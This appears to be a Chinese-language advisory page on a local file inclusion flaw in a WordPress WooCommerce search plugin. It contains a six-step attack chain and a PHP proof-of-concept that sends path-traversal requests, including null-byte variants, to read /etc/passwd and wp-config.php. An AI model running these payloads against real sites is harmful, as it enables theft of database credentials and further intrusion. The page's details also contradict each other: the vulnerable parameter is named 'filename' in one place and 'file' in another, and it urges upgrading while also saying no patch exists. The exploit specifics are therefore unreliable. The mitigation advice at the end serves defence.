CVE-2025-60194: Premmerce Product Search for WooCommerce 插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60194

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premmerce Product Search for WooCommerce (premmerce-search)

漏洞概述

CVE-2025-60194是WordPress插件Premmerce Product Search for WooCommerce中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞属于PHP远程文件包含类型的本地文件包含（Local File Inclusion, LFI）漏洞，存在于插件的premmerce-search组件中。攻击者可以利用该漏洞通过构造恶意请求，包含服务器上的敏感文件，如/etc/passwd、wp-config.php等配置文件，从而获取服务器的敏感信息或进一步实现远程代码执行。由于该漏洞的CVSS向量显示无需认证即可利用（PR:N），且可通过网络远程发起攻击（AV:N），因此对使用该插件的WordPress网站构成严重安全威胁。所有版本从n/a至2.2.4的插件均受影响，强烈建议用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞是由于Premmerce Product Search for WooCommerce插件在处理文件包含请求时，对用户输入的filename参数缺乏充分的验证和过滤所导致。攻击者可以通过构造类似?file=../../../../etc/passwd的路径遍历payload，绕过程序的路径限制，读取服务器上的任意文件。在PHP应用程序中，当使用include、require、include_once或require_once等语句时，如果直接使用用户可控的输入作为文件路径，且未进行严格的路径规范化和验证，攻击者就可以利用路径遍历字符（如../）来访问应用程序目录之外的文件。这种漏洞通常被称为目录遍历或路径遍历漏洞。当被包含的文件是PHP脚本时，服务器会执行其中的PHP代码，为攻击者提供了远程代码执行的可能性。攻击者可能通过包含恶意的PHP文件或利用日志文件注入来实现RCE。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的WordPress版本和是否安装了Premmerce Product Search for WooCommerce插件（版本<=2.2.4）

STEP 2

步骤2

攻击者向目标网站的admin-ajax.php端点发送包含路径遍历payload的恶意请求，如?action=premmerce_search&file=../../../../etc/passwd

STEP 3

步骤3

插件接收到请求后，由于缺乏输入验证，直接使用用户可控的file参数值进行文件包含操作

STEP 4

步骤4

服务器解析路径遍历序列../，将请求路径向上回溯，最终访问/etc/passwd、wp-config.php等敏感文件

STEP 5

步骤5

服务器将文件内容作为响应返回给攻击者，攻击者获取数据库凭证、API密钥等敏感信息

STEP 6

步骤6

攻击者利用获取的凭证进一步渗透，例如通过日志文件包含或上传恶意插件实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60194 PoC - Premmerce Product Search LFI
 * Affected: Premmerce Product Search for WooCommerce <= 2.2.4
 * Type: Local File Inclusion / Path Traversal
 */

// Example 1: Read /etc/passwd
$target = 'http://target-site.com/wp-admin/admin-ajax.php';
$params = [
    'action' => 'premmerce_search',
    'file' => '../../../../etc/passwd'
];

// Example 2: Read wp-config.php
$params2 = [
    'action' => 'premmerce_search',
    'file' => '../../../../wp-config.php'
];

// Example 3: Using null byte injection (older PHP versions)
$params3 = [
    'action' => 'premmerce_search',
    'file' => '../../../../wp-config.php%00'
];

// Send request using cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target . '?' . http_build_query($params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Code: $http_code\n";
echo "Response:\n$response\n";
?>

影响范围

Premmerce Product Search for WooCommerce <= 2.2.4

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）立即禁用并删除Premmerce Product Search for WooCommerce插件；2）使用ModSecurity等WAF规则阻止包含file参数或路径遍历字符（../）的请求；3）限制admin-ajax.php的访问权限，仅允许已认证用户访问；4）实施基于主机的入侵检测系统（HIDS）监控对wp-config.php等敏感文件的访问；5）定期审计所有已安装的WordPress插件，及时发现和移除不再维护的插件；6）启用WordPress的日志记录功能，监控异常的AJAX请求模式。